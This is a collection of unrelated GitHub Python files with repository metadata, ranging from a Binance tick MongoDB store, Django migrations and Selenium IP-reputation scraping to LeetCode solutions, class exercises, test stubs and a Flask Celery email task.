5d39a4c647e09a7af941786d06ff40196afc6d16
/binance-stream-receiver/DAL/Tick.py
0b8f833ac94369973d22e33614c207d3e07d8e75
[]
no_license
adriancr/btc-realtime-data
5c98b82f45a35aa74ab1067941070ae4d5a10afd
ef2f514136a8ae67852350ff1af8647f13bf382c
refs/heads/main
2023-06-06T21:18:51.110082
2021-07-07T01:22:51
2021-07-07T01:22:51
379,719,875
0
0
null
null
null
null
UTF-8
Python
false
false
2,809
py
# from pymongo import MongoClient import pymongo import os class Tick: DB_HOST = os.environ['MONGODB_HOSTNAME'] DB_USER = os.environ['MONGODB_USERNAME'] DB_PSW = os.environ['MONGODB_PASSWORD'] DB_PORT = 27017 DB_NAME = os.environ['MONGODB_DATABASE'] DB_COLLECTION_NAME = 'Ticks' DB_COLS = { 'open': "float", 'close': "float", 'high': "float", 'low': "float", 'volume': "float", 'ts': "timestamp", 'trades_count': "float", 'asset_volume': "float", 'quote_asset_volume': "float", 'tb_base_asset_volumne': "float", 'tb_quote_asset_volume': "float" } MongoDBClient = False DBConn = False db = False dbData = False previousClose = 0 def __init__(self): # print(self.DB_HOST, self.DB_USER, self.DB_PSW, self.DB_PORT, self.DB_NAME) # Start Mongo client self.MongoDBClient = pymongo.MongoClient(self.DB_HOST, self.DB_PORT) # Connect to DB self.DBConn = self.MongoDBClient[self.DB_NAME] # Authenticate to DB self.DBConn.authenticate(self.DB_USER, self.DB_PSW) # Get collection (table) specific DB access object self.db = self.DBConn.Ticks print(self.DBConn, self.db) def initialize(self, item): self.dbData = {} for key in self.DB_COLS: if key in item: dataType = self.DB_COLS[key] if(dataType == 'float'): self.dbData[key] = float(item[key]) pass elif(dataType == 'timestamp'): self.dbData[key] = item[key] pass def setPreviousClose(self, closePrice): self.previousClose = float(closePrice) def preliminaryCalculations(self): # High - Low Amount self.dbData['hl_difference'] = self.dbData['high'] - self.dbData['low'] # High - Low Percentage self.dbData['hl_difference_percentage'] = self.dbData['hl_difference'] * 100 / self.dbData['high'] # Open - Close Amount self.dbData['oc_difference'] = self.dbData['open'] - self.dbData['close'] # Open - Close Amount Percentage self.dbData['oc_difference_percentage'] = self.dbData['oc_difference'] * 100 / self.dbData['open'] # Average open / close self.dbData['oc_average'] = (self.dbData['open'] + self.dbData['close']) / 2 def extraCalcs(self): # Velocity if self.previousClose > 0: self.dbData['velocity'] = self.previousClose - self.dbData['close'] print(f'V: ${self.dbData["velocity"]}') def save(self): # print(self.dbData) self.db.insert(self.dbData)
019b37e958ac81bfffbd96be019f7ec28387189b
e5ae6dc424dc82455a8479b0cdb0a2031ec67fbe
/dashboard/migrations/0028_auto_20210627_1648.py
67b49d3905acb2cfccf5c78251e833d08c29f212
[]
no_license
NumanIbnMazid/auspicious
93851c47e2bc5c48386d5058b9bac9016191c8c9
6c34c51acae0c72fcd55645ff428f00db4b5c467
refs/heads/master
2023-06-17T10:08:32.907112
2021-07-11T08:47:47
2021-07-11T08:47:47
361,688,175
0
0
null
null
null
null
UTF-8
Python
false
false
647
py
# Generated by Django 3.2 on 2021-06-27 16:48 import ckeditor_uploader.fields from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('dashboard', '0027_alter_news_description'), ] operations = [ migrations.AlterField( model_name='job', name='description', field=ckeditor_uploader.fields.RichTextUploadingField(blank=True, null=True), ), migrations.AlterField( model_name='project', name='scope', field=ckeditor_uploader.fields.RichTextUploadingField(blank=True, null=True), ), ]
cc2797a54a4803d037a2651128ce94b755dbb47d
1d71724e7d097ce1e82afd492e48af4a29925f6c
/HM_ip.py
2ba600edaa7f06f56dd697a015adced2ecd6bb01
[]
no_license
13285707631/safety_automation
9e93c05b089ec699a80318ecd08b717383227d49
f0a9c96a69bbf9d5bcccfe866cf5e292ea8d6072
refs/heads/main
2023-04-22T02:37:20.595312
2021-05-12T03:44:16
2021-05-12T03:44:16
366,579,359
0
0
null
null
null
null
UTF-8
Python
false
false
1,310
py
import time import xlrd import re import xlwt from xlutils.copy import copy from selenium import webdriver data = xlrd.open_workbook('md5.xls') sheet1 = data.sheet_by_index(1) data1 = copy(data) sheet2 = data1.get_sheet('sheet2') md5_list = sheet1.col_values(0) option2 = webdriver.ChromeOptions() option2.add_argument(r'user-data-dir=C:\Users\zouyingtong\AppData\Local\Google\Chrome\User Data1') driver2 = webdriver.Chrome(options=option2) count=0 for it in md5_list: count=count+1 driver2.get('https://sc.b.qihoo.net/ip/'+it) time.sleep(3) div=driver2.find_element_by_class_name('logo-box') img=div.find_element_by_tag_name('img') text=img.get_attribute('src') #print(text) if(text=='https://s7.qhres2.com/static/690caa1e021e7040.svg'): print("安全") # print("1") sheet2.write(count-1,1,"安全") elif(text=='https://s7.qhres2.com/static/f33b5998c9d32e14.svg'): print('危险') sheet2.write(count - 1, 1, "危险") elif (text == 'https://s7.qhres2.com/static/f2b955340cb1a4da.svg'): print('普通') sheet2.write(count - 1, 1, "普通") elif (text == 'https://s6.qhres2.com/static/bda7ac71808f75d7.svg'): print('未知') sheet2.write(count - 1, 1, "未知") data1.save('D:/pachong/HM_ip.xls')
9972c126e935fc0202bd7b53c071493d7ca7de1f
f4c37b6eeaf85a995050b3a6ec83c04f774d53b8
/Lesson_6/Task3.py
c799bf5906fc0682249e361299d5f2cc58a48363
[]
no_license
nsimonova/GeekBrains
fee907d7d9ad1916f715721a60c16055853ab2c3
17a95cd4ce70bc33d7bfac7ea8edefd1f032fa1d
refs/heads/master
2023-01-31T18:29:18.431511
2020-12-16T18:33:49
2020-12-16T18:33:49
314,333,286
0
0
null
null
null
null
UTF-8
Python
false
false
1,931
py
# Реализовать базовый класс Worker (работник), в котором определить атрибуты: name, surname, position (должность), income (доход). # Последний атрибут должен быть защищенным и ссылаться на словарь, содержащий элементы: оклад и премия, # например, {"wage": wage, "bonus": bonus}. Создать класс Position (должность) на базе класса Worker. # В классе Position реализовать методы получения полного имени сотрудника (get_full_name) и дохода с учетом премии (get_total_income). # Проверить работу примера на реальных данных (создать экземпляры класса Position, передать данные, проверить значения # атрибутов, вызвать методы экземпляров). class Worker: def __init__(self, name, surname, position, wage, bonus): self.name = name self.surname = surname self.position = position self._income = {"wage": wage, "bonus": bonus} class Position(Worker): def get_full_name(self): return self.surname + ' ' + self.name def get_total_income(self): return self._income['wage'] + self._income['bonus'] manager = Position('Иван', 'Котов', 'менеджер', 40000, 10000) print(manager.name) print(manager.surname) print(manager.position) print(manager._income) print(manager.get_full_name()) print(manager.get_total_income()) economist = Position('Инна', 'Носова', 'экономист', 30000, 5000) print(economist.name) print(economist.surname) print(economist.position) print(economist._income) print(economist.get_full_name()) print(economist.get_total_income())
670b78f9e4287cb9ad30cfc92198c09f4a3dfb34
3a3220cc2961f39fd0bdb86dc1c045446fef1122
/apps/editors/tests/test_helpers.py
de57f41bf9803c6304d167d40d924e9b1496e28a
[]
no_license
zuzelvp/zamboni
03a445c8c01a868d45e56015d1973822d807b873
d900fde75ed69b55a19dbffea612d9ccae04bb82
refs/heads/master
2021-01-18T17:07:05.012750
2011-01-21T19:54:00
2011-01-21T23:16:37
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,024
py
# -*- coding: utf8 -*- import os from mock import Mock from nose.tools import eq_ from pyquery import PyQuery as pq import test_utils import amo from amo.urlresolvers import reverse from editors.helpers import ViewEditorQueueTable class TestViewEditorQueueTable(test_utils.TestCase): def setUp(self): super(TestViewEditorQueueTable, self).setUp() qs = Mock() self.table = ViewEditorQueueTable(qs) def test_addon_name(self): row = Mock() page = Mock() page.start_index = Mock() page.start_index.return_value = 1 row.addon_name = 'フォクすけといっしょ 0.12'.decode('utf8') row.version_id = 1234 self.table.set_page(page) a = pq(self.table.render_addon_name(row)) eq_(a.attr('href'), reverse('editors.review', args=[row.version_id]) + '?num=1') eq_(a.text(), row.addon_name) def test_addon_type_id(self): row = Mock() row.addon_type_id = amo.ADDON_THEME eq_(unicode(self.table.render_addon_type_id(row)), u'Theme') def test_additional_info_site_specific(self): row = Mock() row.is_site_specific = True eq_(self.table.render_additional_info(row), u'Site Specific') def test_additional_info_for_platform(self): row = Mock() row.is_site_specific = False row.platform_id = amo.PLATFORM_LINUX.id eq_(self.table.render_additional_info(row), u'Linux only') def test_additional_info_for_all_platforms(self): row = Mock() row.is_site_specific = False row.platform_id = amo.PLATFORM_ALL.id eq_(self.table.render_additional_info(row), u'') def test_applications(self): row = Mock() row.applications = ','.join([str(amo.FIREFOX.id), str(amo.THUNDERBIRD.id)]) doc = pq(self.table.render_applications(row)) eq_(sorted(a.attrib['class'] for a in doc('div div')), ['app-icon ed-sprite-firefox', 'app-icon ed-sprite-thunderbird']) def test_waiting_time_in_days(self): row = Mock() row.days_since_created = 10 row.hours_since_created = 10 * 24 eq_(self.table.render_days_since_created(row), u'10 days') def test_waiting_time_one_day(self): row = Mock() row.days_since_created = 1 row.hours_since_created = 24 eq_(self.table.render_days_since_created(row), u'1 day') def test_waiting_time_in_hours(self): row = Mock() row.days_since_created = 0 row.hours_since_created = 22 eq_(self.table.render_days_since_created(row), u'22 hours') def test_flags_admin_review(self): row = Mock() row.admin_review = True doc = pq(self.table.render_flags(row)) eq_(doc('div').attr('class'), 'app-icon ed-sprite-admin-review') def test_no_flags(self): row = Mock() row.admin_review = False eq_(self.table.render_flags(row), '')
59f07782e0d05489a26c8339eafa084c234b9684
aec4c4d6a6dcbb53fad5ee6bd8d723ea46f50ed6
/list_advanced_exercise/01_which_are_in_2.py
e1f787a1ef97a16c5f2898b0351a7b1fe961d6d3
[]
no_license
Bukacha88/softuni_python_fundamentals
46efaff70dbb141e9a3dff9cb0cb8fff7001ef59
6ef6389c957015cfa6277353710509bf7d8e4d39
refs/heads/master
2023-02-17T19:30:16.249434
2021-01-13T09:31:04
2021-01-13T09:31:04
298,317,593
0
0
null
null
null
null
UTF-8
Python
false
false
127
py
substrings = input().split(", ") strings = input() print([substring for substring in substrings if substring in strings])
0021a0c6a9b202c958bfd57efd3630e61ab29301
adc3abab7ce04ba10b7a0606475f7ce7e275e9eb
/leetcode.37. 解数独.py
6eab14963905ba0deb1087cc612c3b91e0d7c641
[]
no_license
NonCover/-
ca4e994938318d9fccea173e07679e6029b653ef
0cc970aaa03aa9300319a1e39e052e4beeec6698
refs/heads/master
2020-12-12T06:26:00.019090
2020-06-20T04:40:56
2020-06-20T04:40:56
234,063,173
2
0
null
null
null
null
UTF-8
Python
false
false
2,516
py
''' author: noc time: 2020年4月10日 url: https://leetcode-cn.com/problems/sudoku-solver/ ''' ''' 递归每一种可能性,当前的值无法满足条件的时候就回溯,修改之前的值,直到每一个值符合条件的时候就返回True。 当我插入board[i][j]的值时,前提要求这个位置为空,我们依次插入["1","2","3","4","5","6","7","8","9"],如果某一个值成立的话,就填下一个空, 当下一个空,无论填哪一个值都无法满足条件,就说明我们即将回溯到之前的空修改,修改后依然无法满足,那就继续回溯,直到满足条件 由于数据量是固定的,所以计算机最对会计算 9!的9次方这么多次,因为上一个空填入的值会影响下一个。 ''' class Solution: def solveSudoku(self, board): """ Do not return anything, modify board in-place instead. """ self.recur(board) def recur(self, board): for i in range(9): for j in range(9): if board[i][j] == '.': for val in ["1","2","3","4","5","6","7","8","9"]: if self.row_col_constraint(i, j, board, val): board[i][j] = val if self.recur(board): return True else: board[i][j] = '.' return False return True # 行, 列约束 def row_col_constraint(self, row, col, board, val): for i in range(9): if board[row][i] == val: return False for i in range(row - row % 3, row - row % 3 + 3): for j in range(col - col % 3, col - col % 3 + 3): if board[i][j] == val: return False for i in range(9): if board[i][col] == val: return False return True if __name__ == '__main__': board = [["5","3",".",".","7",".",".",".","."], ["6",".",".","1","9","5",".",".","."], [".","9","8",".",".",".",".","6","."], ["8",".",".",".","6",".",".",".","3"], ["4",".",".","8",".","3",".",".","1"], ["7",".",".",".","2",".",".",".","6"], [".","6",".",".",".",".","2","8","."], [".",".",".","4","1","9",".",".","5"], [".",".",".",".","8",".",".","7","9"]] Solution().solveSudoku(board) for b in board: print(b)
d4537bb78fde457f220b6842619b4619f7525dfc
cb0c6a71c47b78cf0511fafc8e31deafcd77dbf2
/capitals.py
28b1c55e4cf8b43fc0c956d4c46910cd4e274a7a
[]
no_license
kaismithereens/realpython
123ef939c1822508980ba8a042d5d1ed442c2e75
7c57efbe12a3eaa4e8245b72486a77fc2cf78c74
refs/heads/master
2021-04-27T08:50:01.159261
2018-11-03T10:30:40
2018-11-03T10:30:40
122,499,501
0
0
null
null
null
null
UTF-8
Python
false
false
271
py
capitals_dict = { "Alabama": "Montgomery", "Alaska": "Juneau", "Arizona": "Phoenix", "Arkansas": "Little Rock", "California": "Sacramento", "Colorado": "Denver", "Connecticut": "Hartford", "Delaware": "Dover", "Florida": "Tallahassee", "Georgia": "Atlanta", }
e219220037b9c26b07219a3a6cdc3dcfc8a7cf92
4128ff7064d0e5442d08e30e7878f249311bb3e3
/jubakit/test/stub.py
6c6d4673b64ae18513470a41f8d0c4e1bb693ea8
[ "MIT" ]
permissive
vishalbelsare/jubakit
ce4d53ccd61b8569de61ba55f02bd451df3d4b73
f6252ba627ce4e2e42eb9aafaaf05c882bc1c678
refs/heads/master
2021-06-10T01:21:27.557264
2019-05-16T05:19:40
2019-05-16T05:19:40
129,505,666
0
0
MIT
2021-04-04T15:07:16
2018-04-14T10:11:15
Python
UTF-8
Python
false
false
1,295
py
# -*- coding: utf-8 -*- from __future__ import absolute_import, division, print_function, unicode_literals from unittest import TestCase import jubatus from jubakit.base import BaseLoader, BaseSchema, BaseDataset, BaseService, BaseConfig, GenericConfig class StubLoader(BaseLoader): DATA = [1,2,3] def rows(self): for d in self.DATA: yield {'v': d} yield None # None should be ignored by Dataset class StubInfiniteLoader(BaseLoader): def is_infinite(self): return True def rows(self): d = 1 while True: yield {'v': d} d += 1 class StubService(BaseService): @classmethod def name(cls): return '_stub' @classmethod def _client_class(cls): return jubatus.common.ClientBase class StubConfig(BaseConfig): @classmethod def _default(cls, cfg): cfg['test'] = 1.0 class StubGenericConfig(GenericConfig): @classmethod def methods(cls): return ['test', 'test2'] @classmethod def _default_method(cls): return 'test' @classmethod def _default_parameter(cls, method): if method == 'test': return None elif method == 'test2': return {'param1': 1, 'param2': 2} class StubGenericConfigWithoutConverter(StubGenericConfig): @classmethod def _default_converter(cls): return None
e9518d10a5e6eb07e2fad892a857807646a924e5
870f94dd167d5aa11f66979782af2f35f7c3ed34
/codecademy/battleship6.py
d9ec03ad63a43d7fee8b171d9ee7d80f6cd94290
[]
no_license
alblaszczyk/python
52f993844e681fbb455b924cf733923f3b377177
02504c066d0f2d1b8cca08a17f25f383df6247ad
refs/heads/master
2021-09-20T00:57:12.299353
2018-08-01T20:23:44
2018-08-01T20:23:44
108,529,581
0
0
null
null
null
null
UTF-8
Python
false
false
146
py
board = [] for i in range(5): board.append(['O'] * 5) def print_board(board_in): for row in board: print " ".join(row) print_board(board)
34024dbd22ffbb9e00c862b4b6b7328d4d2a250a
49ab3747f5376c6346285179b03bffb4883b595d
/setup.py
53b3b3a7d572827f946d45c32cb7c5f97cb73559
[]
no_license
henryiii/blocklint
529d1bc4d8b2b20a92944d30421248e6b5a718a9
9aedb4335fd7a9d1118c3848d0c9b4adb9ae7397
refs/heads/master
2022-11-29T11:25:55.305289
2020-08-07T18:19:12
2020-08-07T18:19:12
285,908,733
0
0
null
2020-08-07T19:46:09
2020-08-07T19:46:07
null
UTF-8
Python
false
false
248
py
from setuptools import setup setup( name='blocklint', description='Lint for blocklisted words', python_requires='>=2.7', entry_points={ 'console_scripts': [ 'blocklint=blocklint.main:main', ], }, )
78b43379948036f344af666a9ad009ee67a3f4a7
7a4785af3fd65693e7816d40506f2e31440105b0
/longest_substring_without_repeating_characters/solution.py
2862a2d4a9d97077c3fbd35f540c8992e91d59a5
[]
no_license
KevinBaileyCrum/leet_n_skeet
f595cd79a7e67beac14ec0420aa29d937cce18bc
bfdc43018a1da020aee2cc1629902f7d989ac196
refs/heads/master
2021-07-08T13:57:08.998841
2020-08-04T18:15:30
2020-08-04T18:15:30
172,585,915
0
0
null
null
null
null
UTF-8
Python
false
false
1,390
py
# Kevin Crum # finds the longest substring without repeating characters # https://leetcode.com/problems/longest-substring-without-repeating-characters/ # input data from infile presented in a comma seperated list of form # string, expected_integer_length_substring def lengthOfLongestSubstring(s: 'str') -> 'int': max_streak = 0 current_streak = 0 lookup_set = {} beg = 0 current = 0 while current < len(s): if s[current] in lookup_set: end_letter = lookup_set[s[current]] if current_streak > max_streak: max_streak = current_streak while beg <= end_letter: del lookup_set[s[beg]] beg += 1 current_streak -= 1 lookup_set[s[current]] = current current_streak += 1 current += 1 if current_streak > max_streak: max_streak = current_streak return max_streak if __name__ == "__main__": with open ('infile.in') as fin: for line in fin: string, expected = line.split(',') expected = expected.strip() solution = lengthOfLongestSubstring(string) if solution == int(expected.strip()): print('success') else: print('failure\n %s'%(string)) print('\texpected: %s\n\tsolution: %s'%(expected, solution))
74999f5e0be6261cf5e43d3d3da7c5c4171b16e5
572cfd22ed2431912c902bd8faf6a3c0c4a511bb
/pig_latin.py
1adfedd5a9eae674195676dee85b10ab2e986328
[]
no_license
gambitvixi/Python
d0b3e8af64f5c7ae36c2ff432b519998a0ea75d6
5fbddb1e21d83ccdd6301e8d730d2cd87f363fcf
refs/heads/master
2021-10-08T06:34:42.924194
2018-12-09T15:08:04
2018-12-09T15:08:04
160,976,926
0
0
null
null
null
null
UTF-8
Python
false
false
363
py
word = str(input("Please input the word to be translated: ")).lower() samoglasnici = ["a", "e", "u", "i", "o"] pig_latin = "" sufiks = "" mickete = False for slovo in word: for glas in samoglasnici: if slovo == glas: broj = word.index(glas) mickete = True break if mickete == True: break print(broj)
98d87b958fdbce0ac2c183e181145b0b53a88560
8ab09de71584752ee3d9d16c48fd2e812477b924
/items/migrations/0013_item_neues feld.py
97ad730f24ac745a7ebbd48c2177fce1b81c5d6b
[]
no_license
KaiPonel/CatalogWS
c81a7e8e1f43074990bdc10eda4474793f027a49
63c744073b5131fe86bdc9a3789aab4b08f44dc4
refs/heads/master
2023-04-07T22:43:25.750236
2021-04-21T17:35:12
2021-04-21T17:35:12
360,243,239
0
0
null
null
null
null
UTF-8
Python
false
false
403
py
# Generated by Django 2.1.5 on 2021-03-25 13:23 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('items', '0012_remove_item_neuesfeld'), ] operations = [ migrations.AddField( model_name='item', name='Neues Feld', field=models.CharField(default='null', max_length=10), ), ]
86676b1cd142281ea4f4a88b62f32a919fa49e1c
0e1e643e864bcb96cf06f14f4cb559b034e114d0
/Exps_9_v3/I_w_Mgt_to_Wxyz_focus_to_Cxy_focus_series_Pyramid/pyramid_3side/bce_s001_tv_s0p1_L4/step10_b1_train.py
484deffac40d6f97e12e293ee566e739a6a6ad9c
[]
no_license
KongBOy/kong_model2
33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307
1af20b168ffccf0d5293a393a40a9fa9519410b2
refs/heads/master
2022-10-14T03:09:22.543998
2022-10-06T11:33:42
2022-10-06T11:33:42
242,080,692
3
0
null
null
null
null
UTF-8
Python
false
false
4,892
py
############################################################################################################################################################################################################# ############################################################################################################################################################################################################# ### 把 kong_model2 加入 sys.path import os code_exe_path = os.path.realpath(__file__) ### 目前執行 step10_b.py 的 path code_exe_path_element = code_exe_path.split("\\") ### 把 path 切分 等等 要找出 kong_model 在第幾層 kong_layer = code_exe_path_element.index("kong_model2") ### 找出 kong_model2 在第幾層 kong_model2_dir = "\\".join(code_exe_path_element[:kong_layer + 1]) ### 定位出 kong_model2 的 dir import sys ### 把 kong_model2 加入 sys.path sys.path.append(kong_model2_dir) # print(__file__.split("\\")[-1]) # print(" code_exe_path:", code_exe_path) # print(" code_exe_path_element:", code_exe_path_element) # print(" kong_layer:", kong_layer) # print(" kong_model2_dir:", kong_model2_dir) ############################################################################################################################################################################################################### # 按F5執行時, 如果 不是在 step10_b.py 的資料夾, 自動幫你切過去~ 才可 import step10_a.py 喔! code_exe_dir = os.path.dirname(code_exe_path) ### 目前執行 step10_b.py 的 dir if(os.getcwd() != code_exe_dir): ### 如果 不是在 step10_b.py 的資料夾, 自動幫你切過去~ os.chdir(code_exe_dir) # print("current_path:", os.getcwd()) ############################################################################################################################################################################################################### ### 所有 指令 統一寫這邊 from step10_c_exp_command import * ###################################################################################################################### import subprocess as sb # sb.run(cmd_python_step10_a + [f"ch032_1side_1__2side_1__3side_1.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_2__2side_1__3side_1.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_2__2side_2__3side_1.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_2__2side_2__3side_2.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_3__2side_1__3side_1.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_3__2side_2__3side_1.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_3__2side_2__3side_2.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_3__2side_3__3side_1.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_3__2side_3__3side_2.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_3__2side_3__3side_3.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_4__2side_1__3side_1.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_4__2side_2__3side_1.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_4__2side_2__3side_2.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_4__2side_3__3side_1.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_4__2side_3__3side_2.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_4__2side_3__3side_3.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_4__2side_4__3side_1.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_4__2side_4__3side_2.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_4__2side_4__3side_3.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_4__2side_4__3side_4.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_5__2side_1__3side_1.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_5__2side_2__3side_1.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_5__2side_2__3side_2.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_5__2side_3__3side_1.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_5__2side_3__3side_2.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_5__2side_3__3side_3.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_5__2side_4__3side_1.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_5__2side_4__3side_2.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_5__2side_4__3side_3.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_5__2side_4__3side_4.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_5__2side_5__3side_1.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_5__2side_5__3side_2.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_5__2side_5__3side_3.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_5__2side_5__3side_4.{run}"]) # sb.run(cmd_python_step10_a + [f"ch032_1side_5__2side_5__3side_5.{run}"])
60593c1e4021b0b3d0a887f3e857b9f644dece6f
6d11e5bf852ab78df53c9894b725e34edbf24c03
/upgrade_tasks/Helpers/Test/cmd_test.py
617aed546df7bcae4fac1acd38bca5187d3fa83c
[]
no_license
abodup/Avamar-Upgrade-Tasks
cc7996c12a8320b77cce3252fe72c08e28b007bc
029b5242e9b3c72dfcc5eb190bd1c63919954505
refs/heads/master
2021-07-09T15:58:57.122194
2017-10-11T10:09:34
2017-10-11T10:09:34
104,316,622
1
2
null
2017-10-06T08:30:07
2017-09-21T07:36:59
Python
UTF-8
Python
false
false
703
py
#!/usr/bin/python import os from datetime import datetime ############### Start cmd() ############### def cmd(command): printLog("Command: %s" %command) os.system("%s 2>&1 | tee -a upgrade_tasks.log" %command) ############### End cmd() #################### ############## Start printLog() ############## def printLog(message): log = open("./upgrade_tasks.log", "a") log.write("%s %s \n" %(localTime(), message)) log.close() ############## Start printLog() ############## ############### Start localTime() ############### def localTime(): return str(datetime.now()) ############### End localTime() ############### cmd("sudo -u admin chmod a+x /home/admin/proactive_check/proactive_check.pl")
a96e31de7b7dd8c370234800c07105d2d148bc98
df2da399fa30beef60714469293d0061670b893f
/flaskblog/tasks.py
4b0d635d950b79efca54ff8995b43799d803db3d
[]
no_license
JoyceYang2018/project_flaskblog
00a5a96bb5cf535bb2c0009319730462775f0156
8596c76bc3ce7748dcaba6d8d78e0e2e42f21c1f
refs/heads/master
2022-12-15T19:03:46.168447
2018-06-02T08:14:24
2018-06-02T08:14:24
135,800,134
0
0
null
2022-11-22T02:32:28
2018-06-02T08:16:06
JavaScript
UTF-8
Python
false
false
978
py
#coding:utf-8 import smtplib import datetime from models import Reminder from email.mime.text import MIMEText from flask_mail import Message from flaskblog.extensions import flask_celery,mail @flask_celery.task( bind=True, ignore_result=True, default_retry_delay=300, max_retries=5 ) def remind(self,primary_key): #用flask-mail给注册的用户发送提醒email reminder = Reminder.query.get(primary_key) msg = MIMEText(reminder.text) msg['Subject']='Welcome!' msg['FROM']='[email protected]' msg['To']=reminder.email try: smtp_server = smtplib.SMTP('localhost') smtp_server.starttls() smtp_server.login('384381523','') smtp_server.sendmail('[email protected]',[reminder.email],msg.as_string()) smtp_server.close() return except Exception as err: self.retry(exc=err) def on_reminder_save(mapper,connect,self): remind.apply_async(args=(self.id),eta=self.data)
7c4e06d38bcec0ab8cf210950af58101a7b2f52f
1e987bd8b8be0dc1c139fa6bf92e8229eb51da27
/util/photolib/photolib-csv.py
5b03d345efb884102370e0bb6bee17c0c47ce10e
[ "Apache-2.0", "LicenseRef-scancode-unknown-license-reference" ]
permissive
tszdanger/phd
c97091b4f1d7712a836f0c8e3c6f819d53bd0dd5
aab7f16bd1f3546f81e349fc6e2325fb17beb851
refs/heads/master
2023-01-01T00:54:20.136122
2020-10-21T18:07:42
2020-10-21T18:09:06
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,152
py
"""A linter for ensuring that a Photo Library is organized correctly.""" import os import pathlib import sys import typing from labm8.py import app from util.photolib import linters from util.photolib import workspace FLAGS = app.FLAGS app.DEFINE_boolean("write_header", True, "Write the CSV header row.") class CsvDump(linters.ToplevelLinter): """A linter which dumps the XMP metadata of files as a CSV.""" def __init__(self, *args, **kwargs): super(CsvDump, self).__init__(*args, **kwargs) def __call__(self, directory: pathlib.Path): """Run the linters.""" if directory == self.workspace.workspace_root: directory = self.toplevel_dir directory_str = str(directory.absolute()) toplevel_str = str(self.toplevel_dir.absolute()) # Start at the top level. if not directory_str.startswith(toplevel_str): return for abspath, dirnames, filenames in os.walk(directory): relpath = self.workspace.GetRelpath(abspath) print("\033[KScanning", relpath, end=" ...\r") sys.stdout.flush() self._LintThisDirectory(abspath, relpath, dirnames, filenames) def DumpCsvForDirsOrDie(paths: typing.List[pathlib.Path]) -> None: for path in paths: if not path.exists(): app.FatalWithoutStackTrace(f"File or directory not found: '{path}'") # Linting is on a per-directory level, not per-file. directories_to_lint = { path if path.is_dir() else path.parent for path in paths } for i, directory in enumerate(sorted(directories_to_lint)): directory = directory.absolute() app.Log(2, "Dump directory `%s`", directory) workspace_ = workspace.Workspace.FindWorkspace(directory) linter = CsvDump( workspace_, "photos", linters.CsvDirLinter, linters.CsvFileLinter, linters.TIMERS, ) if FLAGS.write_header and not i: csv_dump = linters.CsvFileDumper(workspace_) csv_dump.csv_writer.writeheader() linter(directory) def main(argv): """Main entry point.""" dirs = [pathlib.Path(d) for d in (argv[1:] or [os.getcwd()])] DumpCsvForDirsOrDie(dirs) if __name__ == "__main__": app.RunWithArgs(main)
b6e2f2f1363bb8eb81ac7377d4925a5bd346d9e4
e52dc36d3c4894cb04b7cd2159869592798ac5fa
/demo0/test3/booktest/models.py
c8557ba267620c94a1bfdb81841b4e4f9b51acf9
[]
no_license
lck137/Py1904_lichaokang
26184e778a598996c52a1d2dff03ed62e3fd9538
e90048b4dbae42fa327bc8cc7937750bf2c3f052
refs/heads/master
2022-11-26T12:26:34.726156
2019-07-15T06:38:27
2019-07-15T06:38:27
194,625,303
1
0
null
2022-11-22T04:07:41
2019-07-01T07:50:55
JavaScript
UTF-8
Python
false
false
773
py
from django.db import models # Create your models here. class Bookinfo(models.Model): title=models.CharField(max_length=20) def __str__(self): return self.title class HeroManage(models.Manager): def addhero(self, _name, _content, _gender, _book): hero = Heroinfo() hero.name = _name hero.content = _content hero.gender = _gender hero.book = _book hero.save() class Heroinfo(models.Model): name=models.CharField(max_length=20) content=models.CharField(max_length=20) gender=models.CharField(max_length=5,choices=(('man','男'),('women','女'))) book=models.ForeignKey(Bookinfo,on_delete=models.CASCADE) objects=HeroManage() def __str__(self): return self.name
34c4d9a681c48ff93096b0ff1409aea316d9f809
d9b425f7dc5633dc76a5078be14519b5bf1de312
/text-generation2.py
14aa14dbaf7f747b8e4f9af35957bde16bb9896f
[]
no_license
joeyism/tf-text-generation
f90c7eb34b6be694b245bb051eb79c090a6b60b8
f7221f91d218264454d1db3aa1d09da6f3ca66c6
refs/heads/master
2021-07-08T05:36:05.015663
2017-10-06T03:18:45
2017-10-06T03:18:45
103,059,128
0
0
null
null
null
null
UTF-8
Python
false
false
6,203
py
